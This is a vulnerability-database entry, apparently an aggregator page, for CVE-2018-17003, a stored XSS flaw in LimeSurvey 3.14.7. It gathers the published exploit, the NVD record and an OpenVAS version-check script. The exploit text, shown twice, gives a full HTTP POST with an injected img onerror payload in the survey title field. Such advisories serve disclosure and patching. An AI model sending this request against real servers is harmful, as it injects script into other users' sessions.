DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-31137", "type": "zdt", "bulletinFamily": "exploit", "title": "LimeSurvey 3.14.7 Cross Site Scripting Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-09-20T00:00:00", "modified": "2018-09-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/31137", "reporter": "\u0130smail Ta\u015fdelen", "references": [], "cvelist": ["CVE-2018-17003"], "immutableFields": [], "lastseen": "2018-09-22T13:49:56", "viewCount": 6, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-17003"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113263"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149435"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-17003"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113263"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149435"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/31137", "sourceData": "# Exploit Title: LimeSurvey 3.14.7 - HTML Injection and Stored XSS \r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: https://www.limesurvey.org/\r\n# Software Link : https://github.com/LimeSurvey/LimeSurvey\r\n# Software : LimeSurvey 3.14.7\r\n# Product Version: 3.14.7\r\n# Vulernability Type : Command Injection\r\n# Vulenrability : HTML Injection and Stored XSS\r\n# CVE : CVE-2018-17003\r\n\r\nIn LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert.\r\n \r\n# HTTP Request Header :\r\n\r\nPOST /index.php?r=admin/survey/sa/insert HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://TARGET/index.php?r=admin/survey/sa/newsurvey\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 1171\r\nCookie: PHPSESSID=6o9og816dj2mjcupb6fvj09ob5; YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D\r\nConnection: close\r\n\r\nYII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D&surveyls_title=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E&language=en&createsample=0&description=&url=&urldescrip=&dateformat=3&numberformat_en=0&welcome=&endtext=&owner_id=1&admin=Administrator&adminemail=test%40domain.test&bounce_email=test%40domain.test&faxto=&gsid=23&format=G&template=fruity&navigationdelay=0&questionindex=0&showgroupinfo=B&showqnumcode=B&shownoanswer=N&showxquestions=0&showwelcome=0&showwelcome=1&allowprev=0&nokeyboard=0&showprogress=0&showprogress=1&printanswers=0&publicstatistics=0&publicgraphs=0&autoredirect=0&startdate=&expires=&listpublic=0&usecookie=0&usecaptcha_surveyaccess=0&usecaptcha_registration=0&usecaptcha_saveandload=0&datestamp=0&ipaddr=0&refurl=0&savetimings=0&assessments=0&allowsave=0&allowsave=1&emailnotificationto=&emailresponseto=&googleanalyticsapikeysetting=N&googleanalyticsstyle=0&tokenlength=15&anonymized=0&tokenanswerspersistence=0&alloweditaftercompletion=0&allowregister=0&htmlemail=0&htmlemail=1&sendconfirmation=0&sendconfirmation=1&saveandclose=1\n\n# 0day.today [2018-09-22] #", "_state": {"dependencies": 1645430244, "score": 1659805755}, "_internal": {"score_hash": "4b232735100ae4541a834e9237fb0213"}}

{"packetstorm": [{"lastseen": "2018-09-20T02:05:55", "description": "", "published": "2018-09-19T00:00:00", "type": "packetstorm", "title": "LimeSurvey 3.14.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17003"], "modified": "2018-09-19T00:00:00", "id": "PACKETSTORM:149435", "href": "https://packetstormsecurity.com/files/149435/LimeSurvey-3.14.7-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: LimeSurvey 3.14.7 - HTML Injection and Stored XSS \n# Date: 2018-09-12 \n# Exploit Author: Ismail Tasdelen \n# Vendor Homepage: https://www.limesurvey.org/ \n# Software Link : https://github.com/LimeSurvey/LimeSurvey \n# Software : LimeSurvey 3.14.7 \n# Product Version: 3.14.7 \n# Vulernability Type : Command Injection \n# Vulenrability : HTML Injection and Stored XSS \n# CVE : CVE-2018-17003 \n \nIn LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert. \n \n# HTTP Request Header : \n \nPOST /index.php?r=admin/survey/sa/insert HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://TARGET/index.php?r=admin/survey/sa/newsurvey \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 1171 \nCookie: PHPSESSID=6o9og816dj2mjcupb6fvj09ob5; YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D \nConnection: close \n \nYII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D&surveyls_title=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E&language=en&createsample=0&description=&url=&urldescrip=&dateformat=3&numberformat_en=0&welcome=&endtext=&owner_id=1&admin=Administrator&adminemail=test%40domain.test&bounce_email=test%40domain.test&faxto=&gsid=23&format=G&template=fruity&navigationdelay=0&questionindex=0&showgroupinfo=B&showqnumcode=B&shownoanswer=N&showxquestions=0&showwelcome=0&showwelcome=1&allowprev=0&nokeyboard=0&showprogress=0&showprogress=1&printanswers=0&publicstatistics=0&publicgraphs=0&autoredirect=0&startdate=&expires=&listpublic=0&usecookie=0&usecaptcha_surveyaccess=0&usecaptcha_registration=0&usecaptcha_saveandload=0&datestamp=0&ipaddr=0&refurl=0&savetimings=0&assessments=0&allowsave=0&allowsave=1&emailnotificationto=&emailresponseto=&googleanalyticsapikeysetting=N&googleanalyticsstyle=0&tokenlength=15&anonymized=0&tokenanswerspersistence=0&alloweditaftercompletion=0&allowregister=0&htmlemail=0&htmlemail=1&sendconfirmation=0&sendconfirmation=1&saveandclose=1 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149435/limesurvey3147-xss.txt"}], "cve": [{"lastseen": "2022-03-23T14:24:27", "description": "In LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-09-21T17:29:00", "type": "cve", "title": "CVE-2018-17003", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17003"], "modified": "2018-11-09T17:53:00", "cpe": ["cpe:/a:limesurvey:limesurvey:3.14.7"], "id": "CVE-2018-17003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17003", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:limesurvey:limesurvey:3.14.7:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-10-09T14:49:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16397", "CVE-2018-17003"], "description": "LimeSurvey is prone to multiple vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2018-09-05T00:00:00", "id": "OPENVAS:1361412562310113263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113263", "type": "openvas", "title": "LimeSurvey <= 3.14.7 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# LimeSurvey <= 3.14.7 Multiple Vulnerabilities\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113263\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-09-05 11:15:05 +0200 (Wed, 05 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-16397\", \"CVE-2018-17003\");\n\n script_name(\"LimeSurvey <= 3.14.7 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_limesurvey_detect.nasl\");\n script_mandatory_keys(\"limesurvey/installed\");\n\n script_tag(name:\"summary\", value:\"LimeSurvey is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - An admin user can leverage a file upload question to read an arbitrary file\n\n - An authenticated stored XSS vulnerability can be exploited via /index.php?r=admin/survey/sa/insert\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"LimeSurvey through version 3.14.7.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.14.8 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/LimeSurvey/LimeSurvey/blob/3be9b41e76826b57f5860d18d93b23f47d59d2e4/docs/release_notes.txt#L51\");\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/149435/LimeSurvey-3.14.7-Cross-Site-Scripting.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:limesurvey:limesurvey\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"3.14.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.14.8\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}